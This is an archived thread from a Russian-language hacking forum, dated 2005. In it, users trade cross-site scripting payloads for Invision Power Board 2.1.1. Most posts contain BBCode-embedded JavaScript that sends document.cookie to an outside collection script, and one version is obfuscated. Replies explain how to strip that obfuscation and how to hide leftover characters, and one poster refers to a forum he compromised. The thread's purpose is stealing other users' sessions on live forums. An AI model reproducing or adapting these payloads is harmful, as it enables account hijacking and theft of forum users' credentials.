HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу IPB v2.1.1.
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

IPB v2.1.1.
  #1  
Старый 11.12.2005, 03:43
slime
Познающий
Регистрация: 08.12.2005
Сообщений: 35
Провел на форуме:
133219

Репутация: -1
По умолчанию IPB v2.1.1.
есть ли какие нить способы хакать по мимо загрузки аватаров со скриптами???
Код:
[post=1000[topic=wj style=background&*#58;url(javascript*:document.image*s&#9*1;&#*49;].*src=*"*&#104*;&#11*6;&#1*16;&*#112*;&#5*8;&#*47;&#*47;&#*97;&#*110;*&#116*;&#1*05;&#*99;&*#104;*a*&#11*6;&#*46;&#*114;&*#117*;&#4*7;&#9*9;&#1*03;&*#105;*&#45*;&#98*;&#10*5;&#1*10;&*#47;s.j&*#112;g?"+document.cookie); ][/topic]]
вот такое вот ^^^ не прокатывает... еще есть варианты?
 
Ответить с цитированием

  #2  
Старый 11.12.2005, 04:07
Otaku
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132

Репутация: 116


Cool
PHP код:
 [email]wj@wj[url=http://www.wj.com`=`][/url].com[/email]`style=`background:url(javaSCript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)` 
 
Ответить с цитированием

  #3  
Старый 11.12.2005, 12:53
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982

Репутация: 523


По умолчанию
Код HTML:
[post=1000[topic=target style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ]       [/topic]][/post]
 
Ответить с цитированием

  #4  
Старый 17.12.2005, 19:13
Astro
Познающий
Регистрация: 29.07.2005
Сообщений: 35
Провел на форуме:
126493

Репутация: 3
По умолчанию
Хм, похожая проблема, взломанный мной форум 2.0.4. прапгрейдели до 2.1.1., никакие вышепредложенные варианты не действуют, са уже перепробвал, никто не может помочь советом?
 
Ответить с цитированием

  #5  
Старый 17.12.2005, 19:26
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982

Репутация: 523


По умолчанию
Смотри тут: http://forum.antichat.ru/thread11493.html
И пользуйся поиском по форуму!
ЗЫ: В коде, который привел здесь slime в первом сообщении, нужно поудалять звездочки.
 
Ответить с цитированием

  #6  
Старый 18.12.2005, 18:48
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
По умолчанию
Вот этот попробуй...
[post=1000[topic=target style=background:url(javascript:document.src="http ://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/topic]][/post]
у меня на одном форуме прокатило, но остается '> маскируй его цветом
 
Ответить с цитированием

  #7  
Старый 18.12.2005, 19:03
Astro
Познающий
Регистрация: 29.07.2005
Сообщений: 35
Провел на форуме:
126493

Репутация: 3
По умолчанию
Звездочки раньше догадался убрать, не действует. Из всех предложенных вариантов ничего не помогает....
Наверное админ самые последние заплатки поставил.
Последний раз редактировалось Astro; 18.12.2005 в 19:05..
 
Ответить с цитированием

  #8  
Старый 18.12.2005, 21:46
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
По умолчанию
Скорее всего да, или фильты нужные наваял, но полюбому дыр дофига, изучай, в бб-тегах и до жопы
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ